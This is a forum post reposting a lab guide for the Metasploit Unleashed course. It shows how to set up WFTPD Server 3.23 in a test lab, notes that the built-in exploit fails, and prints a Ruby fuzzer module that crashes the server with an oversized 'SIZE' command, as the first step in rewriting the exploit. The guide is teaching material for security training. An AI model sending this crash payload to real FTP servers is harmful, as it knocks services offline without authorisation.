Results 1 to 2 of 2

Thread: Adding another module to the Metasploit Unleashed course, exploit development

Threaded View

  1. #1
    Join Date
    Jan 2010
    The new forums

    Default Adding another module to the Metasploit Unleashed course, exploit development

    I am transferring this over from the old RE forums, because I think i's a helpful guide for those interested in adding another application to the exploit module in the Metasploit Unleashed - Mastering the Framework course. The guide also goes into detail about exploit development using Metasploit. This guide is not part of the course, and the author can not be held responsible if the subsequent modules from the Metasploit Unleashed course no longer work or conflict the with the initial setup. Here is the original post:

    I did the Metasploit Unleashed course over the holiday weekend and I want to say WOW! Amazing work, enjoyed it so much!

    I wanted to add another application to fuzz and exploit for my own lab, and then I ended up getting carried away and wrote a small guide/module for the course. It plays off the existing modules. There's nothing really 'spectacular' about the guide especially in comparison to the course, but it brings up a good point that happened to me when I installed the FTP server and tried to exploit it.

    Simple FTP Fuzzer

    Remember the carpenter's mantra: measure twice, cut once? Well, the same can be applied for creating exploits. We'll take for example our target running running WFTPD Server 3.23 on our XP machine.

    First, will go ahead and download the software:

    If you installed the FTP server in Windows components, please uninstall it before installing the software. Go to the Control Panel and open 'Add or Remove Programs'. Select 'Add/Remove Windows Components' on the left-hand side. Double click on 'Internet Information Services (IIS)' and un-check 'File Transfer Protocol FTP Service'

    Install the software, add a FTP user and password with full rights and enable logging.

    After running our enumeration scans we see this exploit is already written in Metasploit and decide to go ahead and try it. Set the options and payload and run the exploit. Also make sure to specify the target as it defaults to Windows 2000 Pro SP4.

    And the results are....."Exploit completed, but no session was created."

    Well...we got a crash, but no bind shell. In fact if we we're doing a pentest and that was our only way into the network, we just blew it! The application would have to be reset for us to get another shot! This is where 'measure twice, cut once', comes into play. A good rule of thumb is to always test your exploits before firing them off. Create a lab, as we've done, and test it before you try it on the actual target. The great thing about Metasploit is that it allows you to reuse and modify code very easily. We see the exploit that was already built in doesn't work, so we are going to have to fix it!

    If we hook a debugger up we see the crash comes right at the jump code. Normally a simple fix would be just to change the jump code, since the current one does not appear to work. Since we want to be thorough, we are going to test this exploit from scratch, using our previously made IMAP fuzzer. First we'll go ahead and make a few minor changes in the code.

    root@BT4VM:/pentest/exploits/framework3/modules/auxiliary/fuzzers# chmod 755 ftpfuzz.rb
    root@BT4VM:/pentest/exploits/framework3/modules/auxiliary/fuzzers# cat ftpfuzz.rb
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    require 'msf/core'
    class Metasploit3 < Msf::Auxiliary
        include Msf::Exploit::Remote::Ftp
        include Msf::Auxiliary::Dos
        def initialize
                'Name'           => 'Simple FTP Fuzzer',
                'Description'    => %q{
                                    An example of how to build a simple FTP fuzzer.
                                    Account FTP credentials are required in this fuzzer.
                'Author'         => [ 'ryujin' ],
                'License'        => MSF_LICENSE,
                'Version'        => '$Revision: 1 $'
        def fuzz_str()
            return Rex::Text.rand_text_alphanumeric(rand(1024))
        def run()
            while (true)
                connected = connect_login()
                if not connected
                    print_status("Host is not responding - this is G00D ;)")
                print_status("Generating fuzzed data...")
                fuzzed = "\x41" * 1500
                print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
                req = "SIZE /" + fuzzed +  "\r\n"
                res = raw_send_recv(req)
    We see that only a few minor changes are needed. The original exploit uses the "SIZE" command followed by "/" and a long character string. We know this portion of the code works, since we we're able to crash the application. This can be verified by looking at the original code or by inspecting the packets sent over the network with Wireshark

    cat /pentest/exploits/framework3/modules/exploits/windows/ftp/wftpd_size.rb
    Lets go ahead and fire back up metasploit and see how this looks.

    Last edited by Lincoln; 01-21-2010 at 07:50 PM.

Similar Threads

  1. How to install Metasploit 3.3.3 in Backtrack
    By Subliminal in forum Beginners Forum
    Replies: 5
    Last Post: 11-22-2010, 01:53 AM
  2. introduction to metasploit
    By EcKo in forum BackTrack Howtos
    Replies: 11
    Last Post: 01-22-2010, 06:12 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts